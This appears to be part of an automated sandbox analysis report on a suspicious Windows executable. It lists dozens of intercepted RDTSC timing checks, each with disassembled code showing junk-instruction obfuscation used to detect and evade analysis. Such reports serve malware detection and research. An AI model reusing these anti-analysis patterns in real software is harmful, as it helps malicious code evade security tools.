                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 112C274 second address: 112C28A instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD09CB0C7ECh 0x00000008 jo 00007FD09CB0C7E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 112BFA8 second address: 112BFC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 112D697 second address: 112D6F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 add esi, dword ptr [ebp+122D2BE5h] 0x0000000f push 00000000h 0x00000011 mov dword ptr [ebp+122D2429h], edi 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007FD09CB0C7E8h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 00000019h 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 jc 00007FD09CB0C7FEh 0x0000003c jmp 00007FD09CB0C7F8h 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 112F409 second address: 112F413 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD09CF151B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 112F413 second address: 112F41F instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD09CB0C7EEh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 112F41F second address: 112F429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10D7F78 second address: 10D7F83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10D7F83 second address: 10D7F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10D7F89 second address: 10D7FA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7F6h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10D7FA5 second address: 10D7FAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 10D7FAB second address: 10D7FAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 112DEF9 second address: 112DEFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 112DEFD second address: 112DF03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1133879 second address: 11338EB instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD09CF151B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007FD09CF151B8h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 sub bh, 00000032h 0x0000002b or dword ptr [ebp+122D2312h], eax 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push eax 0x00000036 call 00007FD09CF151B8h 0x0000003b pop eax 0x0000003c mov dword ptr [esp+04h], eax 0x00000040 add dword ptr [esp+04h], 00000015h 0x00000048 inc eax 0x00000049 push eax 0x0000004a ret 0x0000004b pop eax 0x0000004c ret 0x0000004d push 00000000h 0x0000004f movzx ebx, cx 0x00000052 jmp 00007FD09CF151C4h 0x00000057 xchg eax, esi 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c popad 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11338EB second address: 113390B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop ecx 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD09CB0C7F1h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1132972 second address: 11329F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FD09CF151B6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 jmp 00007FD09CF151BFh 0x00000016 push dword ptr fs:[00000000h] 0x0000001d push 00000000h 0x0000001f push ecx 0x00000020 call 00007FD09CF151B8h 0x00000025 pop ecx 0x00000026 mov dword ptr [esp+04h], ecx 0x0000002a add dword ptr [esp+04h], 00000016h 0x00000032 inc ecx 0x00000033 push ecx 0x00000034 ret 0x00000035 pop ecx 0x00000036 ret 0x00000037 cmc 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f jmp 00007FD09CF151C0h 0x00000044 mov eax, dword ptr [ebp+122D16A5h] 0x0000004a push FFFFFFFFh 0x0000004c call 00007FD09CF151C4h 0x00000051 sub dword ptr [ebp+122D36FAh], edi 0x00000057 pop ebx 0x00000058 nop 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d pop eax 0x0000005e rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1134AC8 second address: 1134ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 113585F second address: 1135865 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1135865 second address: 113588E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push esi 0x0000000b jmp 00007FD09CB0C7F9h 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1135A46 second address: 1135A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CF151C9h 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f ja 00007FD09CF151B6h 0x00000015 pop ecx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 11379B7 second address: 11379D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007FD09CB0C7F4h 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007FD09CB0C7E6h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1136B83 second address: 1136B96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\Yh6fS6qfTE.exeRDTSC instruction interceptor: First address: 1136B96 second address: 1136B9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1136B9C second address: 1136BAB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1136BAB second address: 1136BAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1136BAF second address: 1136BB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1136BB5 second address: 1136BBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 11389B7 second address: 1138A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007FD09CF151C4h 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007FD09CF151B8h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a add ebx, dword ptr [ebp+122D31B7h] 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push edi 0x00000035 call 00007FD09CF151B8h 0x0000003a pop edi 0x0000003b mov dword ptr [esp+04h], edi 0x0000003f add dword ptr [esp+04h], 00000015h 0x00000047 inc edi 0x00000048 push edi 0x00000049 ret 0x0000004a pop edi 0x0000004b ret 0x0000004c mov edi, dword ptr [ebp+122D2CDDh] 0x00000052 xchg eax, esi 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 push ecx 0x00000058 pop ecx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1138A25 second address: 1138A37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1138A37 second address: 1138A6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD09CF151C8h 0x00000008 jmp 00007FD09CF151BAh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD09CF151BBh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1138A6F second address: 1138A73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1138A73 second address: 1138A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1137C2D second address: 1137C33 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1138A79 second address: 1138A7E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1137C33 second address: 1137C45 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007FD09CB0C7E6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1137C45 second address: 1137C65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jl 00007FD09CF151B6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1139B56 second address: 1139B5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1139B5B second address: 1139B65 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD09CF151BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1138BB5 second address: 1138BBA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 113BCAD second address: 113BCB7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD09CF151B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 113BCB7 second address: 113BCD9 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD09CB0C7ECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD09CB0C7EDh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 113BCD9 second address: 113BCDF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 113DDB2 second address: 113DDE4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FD09CB0C7F9h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD09CB0C7EDh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1140C2A second address: 1140C46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD09CF151C8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1140C46 second address: 1140C86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CB0C7F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+12455E3Dh], edi 0x00000014 mov edi, dword ptr [ebp+122D3B0Bh] 0x0000001a push 00000000h 0x0000001c jns 00007FD09CB0C7ECh 0x00000022 push 00000000h 0x00000024 mov ebx, dword ptr [ebp+122D2CA5h] 0x0000002a xchg eax, esi 0x0000002b pushad 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 113BEA3 second address: 113BEA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 113BEA9 second address: 113BEC5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD09CB0C7E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d je 00007FD09CB0C7F4h 0x00000013 pushad 0x00000014 jl 00007FD09CB0C7E6h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 113CF11 second address: 113CF2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 jc 00007FD09CF151D0h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD09CF151BEh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 113CF2F second address: 113CF33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 113EF1B second address: 113EF1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 113EF1F second address: 113EFB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FD09CB0C7E8h 0x0000000c popad 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007FD09CB0C7E8h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 push dword ptr fs:[00000000h] 0x0000002f sub ebx, 3367FDF2h 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c or dword ptr [ebp+12455EA6h], eax 0x00000042 mov eax, dword ptr [ebp+122D1145h] 0x00000048 jg 00007FD09CB0C7EBh 0x0000004e cld 0x0000004f push FFFFFFFFh 0x00000051 push 00000000h 0x00000053 push ecx 0x00000054 call 00007FD09CB0C7E8h 0x00000059 pop ecx 0x0000005a mov dword ptr [esp+04h], ecx 0x0000005e add dword ptr [esp+04h], 00000016h 0x00000066 inc ecx 0x00000067 push ecx 0x00000068 ret 0x00000069 pop ecx 0x0000006a ret 0x0000006b call 00007FD09CB0C7EEh 0x00000070 stc 0x00000071 pop edi 0x00000072 mov bh, ch 0x00000074 nop 0x00000075 jng 00007FD09CB0C7EEh 0x0000007b push edx 0x0000007c push eax 0x0000007d push edx 0x0000007e rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 113FEB5 second address: 113FEC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007FD09CF151B6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 113FEC7 second address: 113FED1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 113FED1 second address: 113FED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 113FED5 second address: 113FED9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 113FED9 second address: 113FF37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov edi, 0A849BE1h 0x0000000d push dword ptr fs:[00000000h] 0x00000014 add dword ptr [ebp+12453B00h], esi 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 push ebx 0x00000022 and bx, F730h 0x00000027 pop edi 0x00000028 mov eax, dword ptr [ebp+122D00DDh] 0x0000002e movsx edi, di 0x00000031 push FFFFFFFFh 0x00000033 push 00000000h 0x00000035 push ecx 0x00000036 call 00007FD09CF151B8h 0x0000003b pop ecx 0x0000003c mov dword ptr [esp+04h], ecx 0x00000040 add dword ptr [esp+04h], 00000018h 0x00000048 inc ecx 0x00000049 push ecx 0x0000004a ret 0x0000004b pop ecx 0x0000004c ret 0x0000004d mov dword ptr [ebp+122D3315h], ebx 0x00000053 push eax 0x00000054 pushad 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1141DB0 second address: 1141DB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1146D05 second address: 1146D0B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1146D0B second address: 1146D10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1146D10 second address: 1146D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007FD09CF151B6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FD09CF151C6h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c jo 00007FD09CF151CDh 0x00000022 pushad 0x00000023 push edx 0x00000024 pop edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 114B4EB second address: 114B4F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 114B4F1 second address: 114B4F6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 10DEC67 second address: 10DEC6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 114AEE6 second address: 114AEEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 114AEEC second address: 114AEF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 114AEF1 second address: 114AF0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FD09CF151B6h 0x00000009 js 00007FD09CF151B6h 0x0000000f jmp 00007FD09CF151BAh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 114F965 second address: 114F980 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD09CB0C7F7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 115100C second address: 1151016 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD09CF151B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1151016 second address: 115101B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 115101B second address: 1151021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 1151021 second address: 1151029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 10EE025 second address: 10EE04E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD09CF151C1h 0x00000007 jmp 00007FD09CF151C0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 10EE04E second address: 10EE054 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 10EE054 second address: 10EE058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 10EE058 second address: 10EE062 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD09CB0C7E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Yh6fS6qfTE.exe RDTSC instruction interceptor: First address: 10EE062 second address: 10EE07D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnl 00007FD09CF151BEh 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
